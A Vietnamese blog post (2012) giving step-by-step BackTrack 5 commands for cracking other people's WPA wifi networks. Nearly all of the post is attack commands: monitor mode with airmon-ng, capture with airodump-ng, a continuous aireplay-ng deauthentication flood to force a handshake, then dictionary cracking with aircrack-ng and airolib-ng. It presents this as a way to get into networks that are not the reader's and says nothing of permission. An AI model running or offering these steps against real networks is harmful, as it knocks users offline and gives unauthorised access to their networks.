Các Bạn Vui Lòng Chờ Trong Giây Lát Đang tải dữ liệu Từ ITnguyenHuy...
Thứ Hai, 8 tháng 10, 2012 - 0 nhận xét

Hack wifi WPA với BACKTRACK 5


Hack wifi WPA với BACKTRACK 5


Các bước tiến hành như sau :
1, bật 1 cửa sổ lệnh và gõ :
iwconfig (cái này để xem các card trong máy).
airmon-ng ( để xem máy mình có card wifi hỗ trợ trong
Backtrack ?).Nếu không có thì thôi,khỏi hack lun.
airmon-ng stop wlan0 (interface của card tương thích hiện
 ra trong lệnh airmon-ngtrên).
ifconfig wlan0 donw (không có bước này thì không chạy
 được đâu nhá!).
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0 (mon0 là monitor interface của wlan0
 sau khi thực hiện lệnhairmon-ng start wlan0).
2, mở 1 của sổ lệnh khác gõ :
airodump-ng --bssid BSSID -w wpafile -c CH mon0
( BSSID là MAC tương ứng với wifi mình định hack,hiên ra ở
 bảng  airodump-ng mon0.
wpafile là tên 1 file mình đặt để nó tạo ra file .cap cho mình.
CH là channel tương ứng với cột CH hiện ra ở bảng
airodump-ng mon0 của wifi mình định hack.
)

aireplay-ng --deauth 0 -a BSSID -c STATION mon0 
(gửi đi liên tục các gói tin để thu được WPA handshake
,có thể phải thực hiện vài lần lệnh này cho đến khi nó chạy
 liên tục).
3. Chuyển sang cửa sổ của lệnh airodump-ng mon0,chờ
 đến khi xuất hiện dòng WPA handshake thì dừng lại bằng
cách ấn CTRL +C.rồi gõ lệnh :
aircrack-ng -w /đường dẫn đến file passwordlist/password.lst
 /đường dẫn đến file wpafile-01.cap/wpafile-01.cap 
(thường là /root/wpafile-01.cap ;wpafile chính là tên tương
ứng với lên airodump ở trên ;password.lst là file có chứa từ điển pass ,
mình phải download trên mạng về,có thể là file .text hoặc .dic)
Bây giờ ngồi chờ báo KEY FOUND thôi. :d.
Tuy nhiên cách này rất lâu, chỉ dò được khoảng 900key/s.
Có cách khác nhanh hơn có thể dò được khoảng 30000-40000key/s
.Đó là tạo database cho Backtrack.Làm như sau :
- Các bạn mở thêm 1 cửa sổ lệnh khác, gõ :
airolib-ng crackwpa --import essid /đường dẫn/essid.txt
(essid.txt là file có chứa SSID(tên hiện ra) của wifi mình hack ;
crackwpa là tên database mà mình sẽ tạo ra).
airolib-ng crackwpa --import passwd /đường dẫn/password.lst 
 airolib-ng crackwpa --batch ( kết hợp essid và password.lst ,
 sẽ phải đợi hơi lâu để hoàn thành).

aircrack-ng -r crackwpa wpa*.cap (bây giờ tốc độ dò lên đến
 30000k/s ). :d

Cái này phải phụ thuộc rất nhiều vào file password.lst ,nếu nó
không chứa pass của wifi thì chịu chết k hack được.

Link download Back Track 5 R2
Chú ý : Để log vào giao diện của BT5 gõ : startx

0 nhận xét:

Đăng nhận xét

Liên Hệ Email

Bắc
Trung
Nam
piano
Guita
trống

* Required Create Email Forms

Recent Posts

Danh Mục Bài Viết!!!